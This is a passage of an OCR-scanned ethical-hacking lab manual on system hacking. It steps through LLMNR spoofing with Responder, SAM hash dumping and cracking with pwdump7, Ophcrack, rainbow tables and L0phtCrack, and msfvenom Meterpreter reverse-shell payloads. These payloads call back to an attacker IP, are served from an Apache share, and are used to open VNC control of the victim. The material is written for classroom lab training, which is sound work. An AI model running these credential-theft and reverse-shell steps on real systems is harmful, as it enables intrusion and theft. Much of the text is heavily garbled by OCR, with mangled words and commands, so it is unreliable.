CEH Lab Manual System Hacking Module 06Mode 08- Sytem aching System Hacking Sytem backing i the scene of testing computers and mebwork for vulnerabilities and ara plagin. ‘TE555ET— Lab Scenario Coven Pie aki oe of ie cae at cme ap acs scented compu eset scene Aleagh sted rowed 7 Tesyoe dif enck (or gus) ar ey to cet and aay trot gt ak tattle There, pnrwonds ae one oF he wea inka nh information crany chai BB wircrnie Passwords tely on secrecy, After a password is compromised is onginal awner isa theonly person who can access the system witht, Hackees have macy ways to obi passwords. They can obtain passwords from local computes by using password- cricking sofware. To obuin passwords from aco: a network, dy can use teow cracking writes or nerwor analyzer, "The Ibs inthis mole demonstra just how caily hackers can guher password information from your network, and describe ppasrvord vulnrsilties tha exist in compare networks, s wel as cnaneermensures toh prevent these vulnerabilities fom bing exploited on your systems. Lab Objectives "The objective of this ab sto help students lean to monitor a sytem remot and tocxtac hidden files and other tasks that nce: D wank ie = Exrscting administrative passwords ‘Hiding files and extracting hidden fs + Recovering passwords + Mntoig system remotely erro Lab Environment Gietsbawe Tocsry out by os nek tien F pa . zune A computer mining Winds Srer 2016 Foose + Acompuer ning Wind Server 212 Moa O8 Bem compe uning Windows 10in Vital machine A computer nnning Ko Limxin via machine 1 Avy browcr wi a nem connecson Aisa page to an tos Lab Duration “ine: 190 Minas Girt Ree Tacs ing omer Cprotto 06 Systom Hacking Overview of System Hacking “The pal of stam hacking iso gun acs, xa privinges execute eppiaons, se bie fle. Lab Tasks Biase 7 Recommended labs to assist you in sytem hacking: overview + Active Online Acack using Responder * Dumping and Cracking SAM Mashes to Extra Plaintext Passwords = Geeaing ad using the Rainbow Fables * Auditing Sytem Passwords using Lopnecrack Exploiting Clon Side Vuleerbiliies and Bsublishing a VNC Session *Excalating Privileges by Exploiting lent Side Vulnerabilities Hacking Windows Server 2012 with a Malicious Office Document using ‘ThoFatRat + Hacking windows 10 Using Metasploit and Poet Explition sing Mererpreter * UserSyiem Monitoring and Suvelance wing Seytoch SpyAgont + Web Aetvty Mortriny nd Reoonting sng Power Spy Hiding Fes sng NTFS Streams 1 Hiding Data using Winte Space Stogancarephy 1 Image Steganography using Openstege Tage Steganography using Que Stage + Covert chanach wig Cover Te Viewing, Foabling and Cling Aut Polls using Auatipel Lab Analysis Aca and document the ren ela this ab exec. Give your opinion on the ages security posure and exposure PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONSEe F ton Your Keoetge Bi wetness 1D wort Rew Mos 08- ystom Hacking Active Online Attack using Responder LLMNR/NBENS Spogfing Attack isa clacsic internal network attack that tll works tod, dive to low asareness and the fact it's enabled by defanle jn Windows, Lab Scenario LLIMNR and NBI'NS are enabled by default Wiedows and can be usd to extract the password hashes froma usr. Since the eweronss ofthis etki filo, there fsa good chance of acquiring the wer credentials on intemal network penetration Bysnig forLIMNR/NBT-NS broads routs posse fran atacker to spoofiselfes th sever and senda response cating obe the legtimat sever Air {Ee vein symm ace he comecaen, is pose wo gn the vas mer tredenalsby wing ao ke Responder. Lab Objectives “The objatine ofthis isto hp sme undostand how tx + Pesorm LLMNR/NBT-NS Spoofing attack ona newer Lab Environment “Toperform the ib, you nee "Windows 10 manga a viral machine Kali Linux ronning se virwal machine Lab Duration "Vime: 10 Minutes Overview of LLVINRINBT-NS- When a DNS name server request fal, LinkLocal Multicast Name Resolution (LLMNR) and Net BIOS Name Service (NBT-NS) i wed by the windows systems 25a fillback [fhe DNS name sil remains unresolved the windows system performs fn unauthenticated UDP broadcast to the whole nctworle Any masquerading ‘machin, chiming tobe the server then seeds a response sod eapires the vit’ craenals during the authentication process ‘il Hasan nd Ganemenine Cri Tigi RoeserMote 08- Sytem Hacking Lab Tasks TETE Before sing his nc ac og o Windows 1 machin. 2. Login a8 Username: Jason, and Psswor: qwerty Log into Jason “Account 3. Now lunch Kall Linux vital machine, and login Usermime: root, Password: too 4. Open command terminal from the taskbar, and type responder oth and press Enter as shown inthe seroanshex. LE 5. Responder stan to listen the neswotk interface for events as shown in the screenshot. epeeModo 08-ystom Hacking Assume that you wantto access ashared neework deve connected in your TE rae eevris ing Windows 40 machin. Connect to the 7. Switch back to Windows 10 and rightclick on Start icon, and cick Rum as ‘Shared Directory shown i the sercenshot 8, Run window appeas, ype ieeh-tools inthe Open field and cick OM. “Leave the Windows 10 machine running ad switch back to Kal Linu 1 of program folder, document or ntemet me ee open [Teenrer eal Hacking and Gouenenesurs Cop © Oy EE Rb Rowe epaducen Sty eeMote 08 System Hacking 9, Respondet stars capming the acces logs of Windows 10 machine as 10. Responder will collec the hashes of the logged in eer ofthe pst Boars machine View and crack 11 By default, Responds wil stoze te logs in the wselsharelvespondertiogs ‘Obtained Hash 12, Navigate to Places and cick Computer frm the menu bar a shown inthe screenshot, CLE Nera mp ieMea 06- Sytem Hocking 13, Compurer window appears, navigate to uae > share -> responder > togs and double dick recorded log fle to open and view the rcoeded ca epaeng 14, Hashes ofthe logged in user collected by respond. 15, We ill eack the hashes wo know the password ofthe logged in user ie, Jon, 16, To cack the passwords, open anew command line termscal and type fom Iusrisharetresponderllogsicfile name of the logs.txt> ss shown inthe servonshot Note: og filename wil cfr in you Ib envionment. Here the log fe rire SMBV2-NTLMV2-$SP-10.40.10.10.xt 17, Cracked password hashes ofthe Jason user as shown in the screens ‘Gea Manat Pe ica ating a Ganesan Cp KERMode 08 stem Hacking Lab Analysis Analyze and document he results rate tothe lab excise PLUASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS “Gites emacs SSC Cen Capa “ifisiemres peso nec esadda 08 ystom Machng Dumping and Cracking SAM Hashes to Extract Plaintext Passwords dump? cat be aed to damp prateed flex. pac i fe open sore: (GPL. ‘eonsed) pregram that cracks Winds passwords by wing LM hashes throwgh rain tables Lab Scenario "The Seoutity Account Manager (SAM) is a database file present on Windows machines that stores user accounts and security descriptors for users on a local, Computer. It stores wers' passwords in a hashed format (ix LM hash and NITEM. hash). Because ahash function is one-way, tis provides somemensure of security forthe storage of the passwords Ina system hacking lifeycle,arackers generally ump operating system password hashes immediately afer a compromise of the target machine. The password hashes enable atackers to launch a variety of attacks on the system, inching sword cracking, pas the hash, unauthorized access of othee systems same passwords, password analysis, and pattern recognition, in order to crack other pacewords in the earget environment. ‘You need to have administrator access to dump the contents of the SAM file. "Assessment of password strength is critical milestone during your secrisy assessment engagement. You wl start your password assessment with « simple SAM hash dump and running it with a hash deeryptor to uncover plaintext passwords, Lab Objectives “The objective of this ab isto elp stent earn how to: * Use the plump too! to ext pasword hashes Use the Opherack tool to crack the parswords and obtsin plhin text swordsMla 08- stom Hachng Lab Environment "To catty out the lb you need: Creole " i Pwdump7, locstcd at ZICEHTookICEHVI0 Module 06 System cemoeteted Hacking\Password Cracking Toolsipwdume7 ‘his lab are ‘evilable in * Opnerack (ool, located at ZACEM-TeOMICEHVIO Module 06 System 2sceH- Hackingassword Cracking Toolsiopherack ee eeewm "Rut this tol on Windows 10 Hacking + You can download the latest semion of puckmp? at Mtpsiwen.tarasce.orgisecurity/pudump Tiindexhtml * You can download the latest version of Opherack at bttp2lOpherack.courceforge.not! + Administeatve privileges to run tooks Lab Duration "Time: 10 Micwtes Overview of the Lab adump? can also be weed to dump protected fle. You can slays copy a used file by executing pwdumpT.exe -d c\lockedfiledat backup-lockedfle. det Rainbow tables for EM hashes of alphanumeric passwords ae provided for free bby the developers. By defaue, Opherack is bundled with tables tat allow it to ‘erick passwords not longcr than 14 characters using. only alphanmeric ‘charters, Lab Tasks Before starting this lab, we need to find the User IDs associated with the usemames for Windows 10 machine 2, Launch Windows 40 machine ad log, ° "ikth nana upc sey PoeModule 08 ystem Hacking 3. Launch Command promptin Administrator mode, to lanch type emd in the Search fed sn right-click on Command Prompt, and click Run ‘as edminiatrator as shown inthe screenshot, poe as ey Semerone P ema-«. B Open etseaten Pera a tales 4, User Account Control pop-up appears click Yes, cena recs ‘erred publisher Microso Windows cee Cow ae rade ee ty toes pscon s PeheeMoto 08 ystom Hacking 5. In the Command rnamo,aid and press Entor, ompt window, type wmic waeraccount got 6. By issuing ths command we got the usemames and respective UsetIDs, Make a aote of each UserID for further steps ‘Now, eapy the pssdump? folder from the ZACEH-ToolsiCEHv10 Module 06 Systom Hacking Password Cracking Toots location and paste it on the Desktop. 8. Now, open a new command prompt window in Adminstrator mode snd ype ed CiUsors\AdminDosktop\pwdump7 and press Enter 9. “Type Pwoump7.exe and press Enter to gather the Passwon’ hashes and UserIDs ie 2 3 10, Now, atthe command prompt, {ype PwOump7 xe > cshashos.txt tnd press Enter.otto 08-ystom Hacking 11, By iseuing this command PwDump?.exe will copy all the dat of PwOump7.oxe tothe exhashes.txt il. 12 To check the generated hashes, navigate to eAand open the hashes. ‘le with Notepad. 13. Now place the usemames before the respective UserlDs that we have sathered in atep 625 showa inthe sreenshotDrax Install Opherack D vases sen ins theca ‘Sak Mana Pye 7 Mea 06- System Hocking 1H. Now pres ete save fh fst a window appa. Chose save cation and cic Save Button. moa + Foon inion tie Swear ToDanet sett cg [6 PURE 29 Sin 15, Now, we shall attempt to crack these password hashes with the Opherack tool. 16, Launch Ophcrack application from 2NCEH-ToolsCEHV10 Module 06 ‘Systom Hacking\Password Cracking Toolsiophcrackw86. pom = some fa NGL anangepne nn ica Hating a Grenson Cop 0 Hm ‘ingen opto cy MedMoti 06 -Sytem aching 1, ‘The Opherack main window appears, 2 shown in the serenshor St tose feet een or Retyesctinen EAH om ae 18, Gick the Load menu, and sect PMDUMPHHe, 2 epee ett Shana "GLE ny PROUAP ang a Gomes Crh Bh “pin knwen epee ‘CTE Man PashMoat 06- Sytem Hacks 19."The Open PWOUMP filo window arpeus Browse the PWDUMP fle hhashes.txt located at Desktop. 20, Selec the hashes. tx lk, octet Desktop, an click Open. « TAPE » Dattop > chai oe 1 ocmers ¢ oc oetc)| 2 Mie 21, Hashes are load in Opherack, a shou in the scroensho Ophea Crs Iatan NTO ‘Wd ae HHH eh “Gatttat Mama Pao) —~—~SCS*S*CSCSSC lg Cis re ya Withee opmentREIS ig een 23, ‘Table Section window appears; slect Vita froe and lice ital, Potten rete ICU cages se ‘Gala Maa > "eo akng id Geman Cnr 0 “igi ieeed pesos oe eeMote 08 Sytem Haching 24, The Select the directory which contains the tables window appears Select the table vista froo folder, whichis already downloaded and kept in 236EH- ToolsICEHVIO Module "08 System HackingPassword Cracking ‘Toolslopherack, 2d click Select Folder. Note: You cin download See XP and View Rainbow ‘Tables from ‘tp! Opherack-sourcoforge.nettabice.php. re eng tone toads hashes pu from encrypted Sree ‘SAM recovered wre from a Windows Stents partition ‘sever eee ate Semi J 25, "This ables vita_ffee is a pre-compated table for reversing erptopraphic Jah fonctions and recovering plaintest passwords upto a certain length. 26, "The select table viata frogs installed under the name Vata free, which fs represented by » green colored bile. Select the table, and cick OK 27, Giek Grack on the menu bat. Ophersck begins to crack password ‘Opherack ull ke few minutes wo crack the passworus, Wait unt it nishes the pasword encking procs ‘Ga ak Man Pec el aig Grameen Cop ingen sep Sey Me‘Mose 08 System Hacking 28 In the meanwhile, it wll also display the cracked passwords ofthe respective Srcaacoae he Eas tm Eettmioe shen Spewcd rece Souris een wet RGR Cadet 29, Caacked passwords are displayed, as shown in the following scresho: Gah Mama st ind Hing od Gummo Con Tir owe epics ty oeMotto 08 ystom Hacking 30, In realsime, fan stacker auempts to exploita machine and escalate che privileges, he/she can obtain password hashes using tools such aPWdump7. By doing so, they can use hath decoding tools ike (Opherack to aequite plain-text pesrwards. Lab Analysis Analy all the psrwor! ashes gathered ding this ab, and gre ut what the password os, PLEASE TALK TO YOUR INSTAUCTOM IF YOU HAVE QUESTIONS Yes EINo | ‘Platform Supported | Classroom | “Galiakmal SSC ge Oy Tieeionend peters eeodte 08: Syetom Macna Creating and using the Rainbow Tables Winrkgen is a graphical Rainbow Tables Generator tat sports LM, FasL M, NTLM, LMCHALL, Haj MCHALL, NTLMCHALL, MSCACHE, ‘MD2, MD4, MD5, SHAY, RIPEMDI60, MySOL323, MySOLSHAI, (CisaPIX, ORACLE, SHA-2 256), SHA-2 (384), and SHA-2 512) bases ‘Rainbow rack sa compte program that geen rns tables fr aren pasword raking Lab Scenario (Once an attacker gains accesso asytem’s SAM database damp, the cast and fasted route he a he ean follow eo zecover the pin txt password is wo ws mn bow tbls, A rainbow table is « precomputed table of all posible combirations of « given aracter set and thet respective ash vals, use for reversing cryptographic hash functions. Password crackers compare the rinbow ules precompile Ist of potential hashes to hashed passwords in te database. The ainbow le associates plaintext possibilities with eich of those hashes, which the attacker can then expleit acces the network as an authenticated use. Rainbow tables make pasword cacking mock faster than exer methods, sch as brute force cracking anc dictionary stacks, However, the approach uss alot of RAM ‘de to helatge amount of dt in sch table With the avaablity of age comrating power, jou can generate huge inbow tables chat you can use or your secu and password auditasigaments. Lab Objectives "The objective ofthis ab is to show students how to create taicbow tables and se them to crack the hashes and obvain lai wext passwords. “Galatia SSS~*~*~*~*«C TGMode 08 System Hacking Lab Environment “Toca out hab you et nee + Ainpiner nnag Whi ee Gecotmtetin + Aco nrg Woo 0 canes + Wonges Too loomed a: mieaniecticair|9 made 60 Sytem — Mochogtote Greate Rainsee Feleclatoee TeewCHI0 + Ranhon nck Tol cated 2S Tol Module O8 Stam Hcateseomiom —” fachngrocis erste atone Puoernensewere = 1 Download the lates version of Wine at bttpslwowoxidtiprojectsntmt + Download the latest version of RalnbowCzack at netplproject rainbowernck.com! 1+ Ifyou wish to dounload the lates version, then screenshots shown nthe lab sige ditfer 1+ Administive pages to man the tals Lab Duration "Time 10 Minutes Overview of Rainbow Tables ‘eter A minhow les « pre-compated ble for reversing eryptographic hash functions, tye wed oe enki pasword hashes, Table ate uly eda reenneing the Dldotex panword condring ofa inked cof characters upto acetnlengh Lab Task TErasx + 1, Assume you that you pot the Password of User Accounts available in the Windows 1 machine hashes fle that you have got in the previous lb =e (Dumping and Cracking SAM Hashes to Extract Psintext Puswords located atDeskeop of Windows 10 machine. Share te fle by any medium so thas i ‘can be accessed in Windows Server 2016 machine 2. sane Windows Server 2016 machine and login, 3. Navigate 1 24CEH-TOOWICEHVIO Module 06 System HackingiToole to Create Rainbow TablesWinrigen, and double-click winrtgen-axe, Dsetosivwnty 4 fan Open Fle Secunty Waning pop papper cick Rum “Giana get —SSCSCS*~*S”S”S*R Naga Cac on Am “Eien epsenoe eorakeeeost ‘Gab Maal Ps Meade 08 sytem Hacking 5. "The main window of Winngen opens as shown in se fllowingserenshot Tiga ET Ear ST << 6 Click on Ada Table button to add anew rsinbow table, Wipro Tala Cea <= 7. The Rainbow Table properties window eppears |. Select mtn froan Has deopdona ist. i Secmin Lomas 4, Max Len 2s 6 and Chain Count 4000000 . Sclct mentoh Sum Gharet dropdown Ist Gs depends pon Pawo ‘Beal king nd Gumermems Capo by Em ‘Miagpevacona pcan Sy Poet(Dna eter somata ‘Gta Mona Moa 05: Sytem Hacking oyna Itch alae 61 088 Sse pay 08507280615) 9, Wish these sersings, you ae erating a rinbow table chat can be used 1 eck Cony ntim hashes containing lowercase alphabetical passwords varying Derwcen 46 characters in length. 10. fle wil be crete and diplaed in the Wnrtgen window, Cc OX, TGS TS STD [aa] ree | moet} At UREA Gr 11, Wlartgen pins to crete the hashtable, “Note: Winrgen takes alot of ine to generate hashes. So, to save time for Lab demonstnsion, a pregenerated hash table is kept et the locason 20CeH- ‘TeolsiGEHVI0 Module 06 System Hacking\Tools to Create Rainbow ‘TablesiWinrigen "cd Hing Gunomcaace Cosh Kame Tica owl Ropcancon ney tteBracks [Add password ashes Disincaer More 06-ystern Hachng 12, Thecrened hash tables saved automatically in ZACEH-Tools\CEHV10 Module 06 System Macking\Toots to Create Rainbow TablesiWnrtgen, 13, 14 15. 16. 1 “This generated ‘able is used in took such a8 RainbeneCrack in order to crc pasewards of various lengths, depending on the hashes you generate using ‘Winrgen, ‘Now, we shall uy to use these table aed enc he password hashes using the RainbowCrack wool [Navigate to 2ACEHToolsCEHVIO Module 06 System Hacking\Toots 0 Create Rainbow TablosiRalnbowCrack, and double click rerack gubexe, fan Open Fle - Security Warning pop-up arpears click Run, "The main window of ReinbowCtacke opens, as shown in the following seroashot: Tilia ining Gomme Gye Ema Tags aera Rpwactorsts anosMose 06 -Sytom Hacking 18, To add a password hash in RaiohowCrack, click the Fle meen, and cick Lead NTLM Hashes from PWDUMP File D atretnie Sonar Guten caae we 19. The Open dilog-box appears. Navigite to the hashes txt oF Windows 10 machine that we ave guhered inthe previous ab and click Open. Fem NY TPE eee» [8] (Seek Deton » aie Nee Cr) vow * ome] camare (ei Detee 1S oromee $ denon ie Bier bloat Pree Fenane [esst S| (ees 3 = GLIA At ct Catan Pas ‘ica Hing and Conamcanns Cops hy EE “itthotiat epee ot oteMote 08 -Sytem Haching 2), RainbowCrack wil spay the Hash value and the Username as shown in the serenshox. 21, Import Rainbow table to Reibow nce to crack the password migate Rainbow Table and click Search Rainbow Tables fom the mrs br. ‘Seah Mana Pe aie ating Grameen Cop ‘Mingo al sep Sey MeMode 08- Sytem aching 2. Open aig box appears ravigite wo pre generated rin thle which are Jocated at and select mm Joweraiphata-6.0 2400%4000000 onid000.rt click Open. woe 5 + 4 Be coho. + Rivers) (Sec abo rg + Nfl 720 [irene tame . Oaemottes pe arare Limeiowphenmeis4nitole. 500i terre mooie £8 Donen $ Dome 2 moe Wives Ltearmeer Seo a nane[ijowesp9 0504 (Rien iH ES ‘GURESHY Seige we 23, As sn as you impor the rsinbow tables the RainbowCnek wil ac the password oF the Windows 10 zrachine uses a shown in the screcashot SCE TabMamal Puce SSS ‘thea Hache Gomermcanes Cop ED “Tiina peso nec reLab Analysis “Analyze and document the rsuks related to this kb exercise. PLEASE TALK 70 YOUR INSTRUCTOR If YoU HAVE QUESTIONS No Dilabs SSC ga oe EO Teigis amend Rpecctor sy novia F eye cee Ba Web cune (D wsktt revew Morte 06 ysten Hacking Auditing System Passwords using LOphtCrack LOpbrac isa pascoord auditing tol that contains fares such as scbedaing, bash extraction from 64-bit Windows versions, maltiprocesar clits, and network _montring and decading tcan import and crack UNIX password ls fram renee Windows machines Lab Scenario Because security and compliance are high priorities for most organizations, attacks on an organization's computer systems take many different forms, such 28 spoofing, smarfing, and other types of Denial of Service (DoS) attacks. These attacks are designed to harm or interrupt the use of your operational systems, Password enicking isa term used to deseibe the penetration of a network, syste, ‘resource with or without the use of tools to unlock a resource that has been secured with a paseword, In tis lab, we will lok at what password eracking why auackers do it, how they achieve thee goals, and what you ean do to do t© protect youself. Through an examination of several scenarios, in this Ib we describe some of the techeiques they deploy and the tools that aid them in heir assaults and how password erackers work both internally and exterrally to vilace ‘company's infrastmetiee. "To be an exper ethical hacker and penetration tester, you must understand how +o emck an administator password. In this lab, we crack system user accounts using LOphtCrack. Lab Objectives “The objective ofthis ab to hep sadents eam how ta: * Use the LOphtCrack tool to attain user passwords that can be easily cracked iia Wangs Caen ans Cie TExpatoweal upactora sacl atMori 08- Syste Hacking Lab Environment "To carry ovt the lab you need: * Lophtcrack too! located at ZICEM-TooIeICEHV10 Module 06 System HackingiPasaword Cracking ToolsiLOphtCrack — + Windows Server 2016 running 8 machine ‘demonstratedin = Windows Server 2012 running as a machine ‘hin lab are beolaal + Ordownload the latest version of LophiCrack at aon bttpstwwwJOphterack.com ‘TootseEHVIO + Administrative privileges to ran tools Mode 06 System ee Hacking Lab Duration “Tie: 15 Minstes (Overview of the Lab In thislab being a security audi, you wil be sunting the LOpbxCrack tool by giving, the remote machine's adminstrtor ase eens User accounts passat that ae cnacked ina short amour of time are consiered wo be weak, and you ace to take carn measures wo make then stones. [inthis lab, we ae ding pasrwonds on a Windows Server 2012 system, Lab Tasks 1. Launch windows Server 2012 vtwal machine 2. Launch and Login ta Windows Servor 2016 and navigate to 2ACEM- ‘Tools\CEH¥10 Module 06 System Hacking\Paasword Cracking ‘ToolsiLOphtCrack. Double dick le7aetup v7.0.5. Win6A axe, 3. fen Open File - Security Warning appear, click Run, D venoms 44. Follow the wizard driven instalation steps to install LphtCrmek, fe IENEMA Note: At the time of instalation, Program Compatibility Assistant pop-up ore eo ‘may appear. Click Close, and continue with the installation. Siena OSCR Gams Co OhMode 06 System Hocking 5. On completing the installation, lninch LOphtrack application ftom Apps ist, Sake OSCR man Cp ‘ital Ropes sey tedMole 08- System Hacking 7. Click Password Auditing Wizard 2s showa inthe screenshot ers 8. In Introduction wizard click Next. troductio Sa Mal Pee acl angto 08- ystom Mackng 9, In Choose Target Systom Type wizard choose the Operating System ‘ype and click Next. In this lab we are choosing Windows, 10. Choose A remote machine rudio buton in windows Import wizard clic. es “GiniabMnad Pye SCSCS*~*~*~*S*S*S*S*« ga oe Cap Oy BEMote 08. System Hacking 11, lo Windows Import From Remote Machine (SMB) wizard, type in the required details as shown in the screenshot, 12, tn the Moat field type the 1P address of the ‘Target machine, here Windows Server 2012 (40.40.10.12) 13, Select Use Specific User Credentials radio button, and in_ the Credentials section type the login Credeatias of Windows Server 2012 machine Usemame: Administrator Passwort: PasswOrd 14, 1 the machine is under the Domai, enter the domain name in the ‘Domain ection, here Windows Server 2012 belongs to CEH.eom domain, 15, Once you entered al the required fel, click Next proceed. iL Manel Pa cs aking Gomis Gy FO “ipieires posse sence oesMode 08- System Mackng 16, In the Choose Audit Type wizard, sclect Strong Password Audit radio ‘patton and elck Met. 17. In Roporting Options wizard, check Gonerato Report at End of Auditing ‘option and then choose the Report type (here, SV) and click Browse ‘button to store the seportin the desired location ES Gitta Nl Fe Tan a oaemae ay eamMadde 06- atom Macng 18. In this ab we are choosing location as Desktep. ‘Type file name, and cick ‘Save in Choose report file name window as shown inthe serenshot $ oe 2 isa wiser tate io 19, Click Met inthe Reporting Options wizarl after providing the location GLa eed Be Yoo Taig Game org GmMoo 08 stom Hacking 20. Choose Rum this job immediately radio button and click Next in the Job Scheduling wizard. "| 21, In the Summary wizard, click Finish ‘CT ab oat Pa "ill Hang nd Gomsemsorans Cpr | Wissen RectorateMola 08-ystom Hacog 22, Perform Calibration pop-up appears; click Mo to continue [Note: Perform Calibration pop-up will appesr muliple times ducing the patswond cracking process, click No every time i app 23, Copying LG7 Agent pop-up appears click Yes to continu.Mea 06- Sytem Hocking 24, LophsCrack stars cracking the passwords of the target machine. In the lower ight commer ofthe window you can sce the statue as shown in the screenshot. 25, LOphtCrack will show you the cracked passwords of the wers that are available in the target machine. “Gaiiahiimad Pyeaii—~S~*~*~*S*SCS*C a ig iy "iaghoknond Aynaindon rn eet‘Gia ae Mote 8- Sytem Hacking 26, So, you have succesflly stained weak as wellasstong password. You can ‘ick che 3tep bution preset atthe lower let come ofthe window ance you ‘ain all the passwoeds Lab Analysis cumental the results and repos heed ding the lb PLEASE TALK 70 YOUR INSTRUCTOR IF YOU HAVE QUESTIONS No Bitabs ‘i king nd Gomme Cosh mad “itirktncsapmsncsons Sey aeMode 06 Sytem aching Exploiting Client Side Vulnerabilities and Establishing a VNC Session Attacker ase chent-sdeobnerabites to exphit unpatched sofsare, tery ating cst the machine on wbic te sofia i intl “Teoweey Lab Scenario rvs 'YNC enables attackers to remotely access and control computees targeted from — lems othe computer or mole deviog whecrer they icin the work Ate sme 7 tecyar hy Blac ec by och autre sod epiation caghons cry AEE intity sector for 4 tmge of difeese cna aod wwe cacny, ncn Tweens: peovidig IT dedtaop pos io colleagues and fends ond axcesog ote Oe et — Eel mem en Ee rare He os coll ps few: citer can plc Dveeitoteer Yoembilis in get sytem 1 evablsh eowuthozed VNC seston and emorely contol thete wget Lab Objectives "The objecive of this kb is wo help students learn how to explit client-side C700 valhembiltes and exslish a VNC session. demonstrated in : ‘this tab are Lab Environment avaliable in ec “Toccny this out you edt TootsicEHv10 + Kali Tinox running in views machine (Aracker Machine) Module 08 Syotem Hacking * Windows 10 running in vitual machine (Vici machine) 1 Avweh browser 1 Admisiseaive privileges wo ran vols Lab Duration "Time: 10 Minutes “GitiahMtinad heas—~—~SCSC*~*S*SCSCS:C«R ge CO AEN Mingo noone pede Sey PantModide 06 yatom Macng Overview of the Lab "This lb demonstrates the esploiusion prooadure enforoad on a wealy patchal \Windows 10 machine tht allows yoo to gan remote access t it through a emote deslenp connection, Lab Tasks rE 1, Launch Mal Linux machine and login. Open a Terminal and type erase imsfvenom-p windowsimeterpreterireverse tep ~platform windows -a Launch X86 “I exe LHOST=(attacker machine IP address) LPORT=044 -o Metapoit rootiDesktop/Test.exe and press Enter. —— Note; Here the attacker machine IP address is 4 Machine) 10.10.44 (Kali Linux 2. This will enctate Testexe, a malicious file on Desktop as shown inthe seroenshot. [D sseenetensoie 3. Now create a ditectoryto share this fle provide the permissions and copy the file from Desktop to shared ‘he vietm’s machine, Diesen location Bice 4. "Type mkdie vartworwihtmlishare and press Enter to create a share folder, bh. “Type chmod -R 755 ivarkewwhtmllshare andl press Enter © "Type chown 8 wunwdatarwunmdata warhwwarhtnishare pecss EnterMea 05: Sytem Hacking Now copy the malicious file to the shared location by typing 6p nootDesktoprTest.oxe Wvarlwiwhtmi'share 2nd press Enter. CD rremwcrnt Bitasx a 4, Now stat che apache service, todo this type service apache2 start and ——— press Enter Exploit for cia Windows, 5, “Type mateonsole and press Enter to launch Metasploit framework. ELS Doses 6, In ms console type wae muttmandler and press Enter. Setting Payload 7. Now we need to set the payload, LHOST, LPORT to do this a. “Type set payload windowsimeterpreterireverse tep and press Enter. 1b Type sot LMOST 10.10.40.44 and press Enter. c. Type st LPORT 444 and press Enter. ‘Gaiam Tied aig ad Goreme Co OrMotte 06- Seton Hacking A. “Type explott and press Enter to stat the listener, Leave the Kall Linux machine running and switch to Windows 40 machine. 9. Login to Windows 40 machine, ting the Chrome browser nd open a browser In this lab we are 10, In cheadvess bar of the browser type ttps40.40.10-4ishare and press 11, As soon as you press Bote, it wil display the share foller contents as shown io the screenshor. 12, Click Testexe file to download Note; 10.40.40.14 is the IP address of the Tin, tacker machine ie, Kali ‘ita Namal Pash "hi gal Gomes nh akMoti 08- System Hacng 13, The malicious fe willbe downloaded in the defiule downloads location ofthe browser. Her in this ab Downloads is the loeation, Now, double- click the Festexe file to un, Brasxe 14, Open Filo - Socurity Waring window appeats. Click Rum. Leave the aed Windows 10 machine running, and switch #0 Kall Lina michioe [opanFia Sey Waray ‘he pubscer could not be verified. Are youre you watt run tht [EE _ Mr Gientmnomtatet ne Pubihes Unknown Pb Type: Apaietion Frome CAservdrin\Downlnds Tee == WQ peseosesenynnsotenr tome away asceforeoperng tiie ‘Gata Mana Pye ‘a ting Canememns Cap KE Wik oowal upeantont acd oeMoco 06Sytom Mocking 15, Now switch to the atucker machine ie,, Kali Linux machine. Observe ‘that one session is created or opened in the Meterproterahell as shown in the screenshot [2 winiwtonie 16, To open a session in Meterpreser shell ype seasons i and press Enter. eer ‘Note: Ifthe Meterpreter shell is connected to the session automaticaly then skip this sep. 17, Meterpreter shell appears as shown in the screenshot. Type eysinfo and Dra? ress Enter ro reay tat Windows 10 machine is backed. Remote View in oar - ail Um al 18, Now, ewate a VNC session to capasre wo access Windows 10 machine remot.Me 06- Syste Hacking 19, "Type nun vne aad press Enter. 20, This will open « VNC session ofthe Vitim’s machine as shown in the sercenshot, GLa al aaa Goan‘Mose 08 System Hacking Lab Analysis Analyze and document the results rat to this ub exercise, Provide your cpinion ‘egucing your get's secuity posure and exposure. PLUASE TALK T0 YOUR INSTRUCTOR IP YOU HAVE QUESTIONS No Citabs ‘Gta Maal Pee ‘ial Hang nd Gomme Cori Oy Be Titec eect epics Ses aeModde06- Sytem Hocking Escalating Privileges by Exploiting Client Side Vulnerabilities ‘Privilege Escalation is the demon stration of meicusing a bug, comfgunasion imperfiction, or devs oversight in working frames. ar programing sppiation fo ncreae ‘ied aes oes that ae relay shed a opphation or det Lab Scenario Once stacker gin access tothe get sytem, they start looking for diferent ways to cscalete thee privilege inthe sytem. They can expat valnenbliy, design Taw or configuration oversight a the operating system or software applications on He target system to gain clevited acces to resurees that are normaly proctad from an spplicition of wer The privilege escalation canbe wetcal or ater. Lab Objectives “The objetivo his lato help stent kam ow to ecatepvieges na vim machine by expaiting its valserbiies. Lab Environment “Yoppsform this ib, you nec Windows 8 runing as vimal machine Windows 10 runningas vitual machioe 1 Kali mx running as vital machine Lab Duration “Time: 20 MinaresMose 08- stem Hacking Overview of the Lab This ab demonstrates the exploitation procedure enforced on a weakly patched Windows 8 machine that allows yout gain access wo it rough a meterpee shell and then employing privilege eclation techniques to atin acminisative pve tothe machine though meterpreter shell Lab Tasks Note: Before performing this lab, log in to Kall Lima viraal machine. Clie Places > Computer. Navigate to File System > ete > apache, open ‘apache2.conf, enter the command servamame localhost in new lie, and save the fil TE yas a 1 Launch Windows 40 vial machine and log in to its administrator cestes secount, Backdoor 2. Switch to Kal Linx viral machine and log int it 3. Launch a command line termina 4. ‘Type the command mefvenom -p windowsimotorpreterireverse tp = plationm windows -a x06 -e x0G/shikata ga.nal-b "00" LHOST=10.10.10.11 exe > DesktoprExploit exe and press Enter. ‘The sbove command will crate a Windows executable fle named “Explottoxe” and willbe saved on the Kall Linux desktop, Dametasoitt ‘Sreoneesane ‘lat code ‘pot machine “Giitiae Mel Rese ——~SCSCS*~*~*S*SCSSSC nga Ces gr ‘ight Rope Sey eeoato 08 ystom Hacking Torases 6 Nowyou need co share Explottiono with the victim machine. (In this lab, a ‘we are using Window 10 asthe vicim machine) Exploitexe Fle 7. Open a new command line terminal, type the command mka Iwarewuntmlishare and press Enter to crete a new dzeciory named a tat ven ssh Tes ip 8, Change che mode forthe share folder to 785 by typing the command chmod -R 755 ivarworwinemlanarel snd press Enter, 9, Change the ownership of thet folder to www-data, by typing the command chown -R wrawedatanwiwedata Warwwwintmllshare! xo pressing Enter. TET ooo 10. "Type the command te4a vartwurwhtml | grep share and press Enter. oooMoa 06 Sytem Hocking 